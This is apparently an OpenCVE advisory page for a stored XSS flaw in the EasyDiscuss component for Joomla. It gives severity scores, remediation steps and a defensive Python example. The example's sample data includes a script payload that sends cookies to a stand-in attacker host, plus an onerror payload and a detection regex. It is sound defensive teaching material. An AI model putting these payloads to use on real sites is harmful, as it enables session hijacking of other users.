Description
Lack of input filtering leads to a persistent XSS vulnerability in the user avatar text handling of the Easy Discuss component for Joomla.
Published: 2026-01-16
Score: 9.4 Critical (CVSS v4.0, assigner-supplied; NVD's CVSS v3.1 rating is 5.4 Medium)
EPSS: < 1% Very Low
KEV: No
Impact: Persistent Cross-Site Scripting
Action: Immediate Patch
AI Analysis

Impact

Lack of input filtering in the user avatar text field of the EasyDiscuss component for Joomla allows an authenticated user to store script in a profile that is later rendered, unescaped, to other users who view it. This persistent (stored) XSS can lead to theft of session cookies where they are not marked HttpOnly, tampering with displayed profile content, and execution of attacker-controlled JavaScript in the victim's browser with the victim's session, including any administrative actions that session can perform. The weakness is CWE-79 (improper neutralization of input during web page generation).

Affected Systems

The vulnerability affects Stackideas.com's EasyDiscuss extension for Joomla, versions 1.0.0 through 5.0.15 inclusive (CPE cpe:2.3:a:stackideas:easydiscuss:*:*:*:*:*:joomla\!:*:*). Any Joomla site running one of these versions of the component is affected, regardless of the host's operating system or web-server configuration.

Risk and Exploitability

The 9.4 Critical score is the CVSS v4.0 rating supplied by the assigner (Joomla): CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H. NVD's CVSS v3.1 assessment is markedly lower at 5.4 Medium (CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N), which is the usual rating for a stored XSS that needs a low-privileged account and victim interaction; the practical severity on a given site depends on who views profiles there, since a payload rendered to an administrator inherits that administrator's session. Both vectors agree on the preconditions: the attacker needs an account able to create or edit a profile (PR:L), and a victim must view the affected page (UI:P in v4.0, UI:R in v3.1). The EPSS score is below 1 %, indicating a very low probability of exploitation at present; it is not listed in the CISA Known Exploited Vulnerabilities catalog, and the SSVC assessment on the record reports no known exploitation and rates it as not automatable. The expected attack is to create or edit a user profile so that the avatar text carries script tags or an event-handler attribute; the stored payload is then rendered in the browser of every other user who views the profile, resulting in client-side compromise. Because the payload lives in the database, the effect persists across sessions and users until the stored value is removed.

Generated by OpenCVE AI on April 18, 2026 at 05:45 UTC.

Remediation

No vendor fix or workaround currently provided.

OpenCVE Recommended Actions

  • Update EasyDiscuss to a release newer than 5.0.15, the last version in the affected range; no vendor advisory is linked on this record, so confirm the fix against Stackideas' release notes.
  • Audit existing user profiles for stored payloads (avatar text containing HTML tags, on* event-handler attributes or javascript: URLs) and clean them; patching stops new injection but does not remove what is already in the database. Add server-side sanitization of the avatar field as defence in depth.
  • Joomla's Global Configuration Text Filters apply to core forms and to extension form fields that opt into them, so they are not a guarantee for a third-party component's field; verify that the avatar value is actually filtered on input and, more importantly, HTML-escaped on output.
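To make the failure mode described under Risk and Exploitability and the cleanup steps above concrete, the following Python script is an added example written for this page; it is not EasyDiscuss or Joomla code and does not model the component's real template or database schema. The profile rows, the avatar_text column name and the attacker URL are constructed for illustration. It shows the vulnerable rendering pattern (stored text concatenated into HTML), the hardened pattern (escape on output), and a heuristic scan of the kind an administrator would run over existing profiles before cleanup.

```python
"""Stored XSS in a plain-text profile field: vulnerable rendering, hardened
rendering, and a scan for payloads already sitting in the database.

Added example for this page. It is not EasyDiscuss or Joomla code; the
table layout, column name and attacker URL below are constructed.
"""
import html
import re

# Constructed rows standing in for a profiles table with an avatar-text column.
PROFILES = [
    {"id": 1, "name": "alice", "avatar_text": "Hi, I'm Alice"},
    {"id": 2, "name": "mallory",
     "avatar_text": "<script>fetch('https://attacker.example/c?' + document.cookie)</script>"},
    {"id": 3, "name": "bob", "avatar_text": '<img src=x onerror="alert(document.domain)">'},
    # Harmless text that happens to contain HTML metacharacters; it must survive.
    {"id": 4, "name": "carol", "avatar_text": "2 < 3 && 3 > 2"},
]


def render_avatar_unsafe(avatar_text: str) -> str:
    """The vulnerable pattern: stored text concatenated into markup as-is.

    Whatever a user stored is handed to every viewer's browser as HTML."""
    return f'<div class="avatar-text">{avatar_text}</div>'


def render_avatar_safe(avatar_text: str) -> str:
    """Hardened pattern: escape on output (the PHP equivalent is
    htmlspecialchars($text, ENT_QUOTES, 'UTF-8')).

    The browser now treats the stored value as text, so '<script>' is shown
    literally instead of executed."""
    return f'<div class="avatar-text">{html.escape(avatar_text, quote=True)}</div>'


# Markup that has no business in a field meant to hold plain text:
# an HTML tag, an on* event-handler attribute, or a javascript: URL.
# A review heuristic for an audit, not an oracle.
SUSPICIOUS = re.compile(
    r"<\s*/?\s*[a-z][^>]*>"      # <tag ...> or </tag>
    r"|\bon[a-z]+\s*="           # onerror=, onload=, ...
    r"|javascript\s*:",          # javascript: URL scheme
    re.IGNORECASE,
)


def find_stored_payloads(rows):
    """Return ids of rows whose avatar text looks like injected markup.

    This is the cleanup step after patching: the fix stops new injection but
    does not remove what is already stored."""
    return [row["id"] for row in rows if SUSPICIOUS.search(row["avatar_text"])]


def strip_markup(avatar_text: str) -> str:
    """Server-side normalisation for storage: drop any tags, keep the text.

    Defence in depth only; render_avatar_safe is still required on output."""
    return re.sub(r"<[^>]*>", "", avatar_text)


def render_profile_list(rows):
    """Render every profile with output escaping, as a page template would."""
    return "\n".join(render_avatar_safe(row["avatar_text"]) for row in rows)


if __name__ == "__main__":
    flagged = find_stored_payloads(PROFILES)
    print("rows with stored payloads:", flagged)
    for row in PROFILES:
        if row["id"] in flagged:
            print(f"unsafe : {render_avatar_unsafe(row['avatar_text'])}")
            print(f"safe   : {render_avatar_safe(row['avatar_text'])}")
            print(f"cleaned: {strip_markup(row['avatar_text'])!r}")
```

The scan deliberately leaves carol's "2 < 3 && 3 > 2" alone: the point of the audit is to find markup, not to reject every angle bracket, and the output escaping in render_avatar_safe is what makes such text harmless. Run the scan in review mode first and confirm each flagged row before editing the database.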

Advisories

No advisories yet.

References
History

Fri, 30 Jan 2026 18:45:00 +0000

Type               Values Removed   Values Added
CPEs               (none)           cpe:2.3:a:stackideas:easydiscuss:*:*:*:*:*:joomla\!:*:*
Metrics (cvssV3_1) (none)           {'score': 5.4, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N'}


Mon, 19 Jan 2026 09:45:00 +0000

Type                Values Removed   Values Added
First Time appeared (none)           Joomla; Joomla joomla; Joomla joomla!; Stackideas; Stackideas easydiscuss
Vendors & Products  (none)           Joomla; Joomla joomla; Joomla joomla!; Stackideas; Stackideas easydiscuss

Fri, 16 Jan 2026 16:15:00 +0000

Type           Values Removed   Values Added
Metrics (ssvc) (none)           {'options': {'Automatable': 'no', 'Exploitation': 'none', 'Technical Impact': 'total'}, 'version': '2.0.3'}


Fri, 16 Jan 2026 15:15:00 +0000

Type               Values Removed   Values Added
Description        (none)           Lack of input filtering leads to a persistent XSS vulnerability in the user avatar text handling of the Easy Discuss component for Joomla.
Title              (none)           Extension - stackideas.com - Persistent XSS in EasyDiscuss component 1.0.0-5.0.15 for Joomla
Weaknesses         (none)           CWE-79
References         (none)           (none)
Metrics (cvssV4_0) (none)           {'score': 9.4, 'vector': 'CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H'}


MITRE

Status: PUBLISHED

Assigner: Joomla

Published:

Updated: 2026-01-16T15:41:11.155Z

Reserved: 2026-01-01T04:42:27.959Z

Link: CVE-2026-21624

Vulnrichment

Updated: 2026-01-16T15:41:03.493Z

NVD

Status : Analyzed

Published: 2026-01-16T15:15:54.873

Modified: 2026-01-30T18:43:24.353

Link: CVE-2026-21624

Redhat

No data.

OpenCVE Enrichment

Updated: 2026-04-18T05:45:38Z

Weaknesses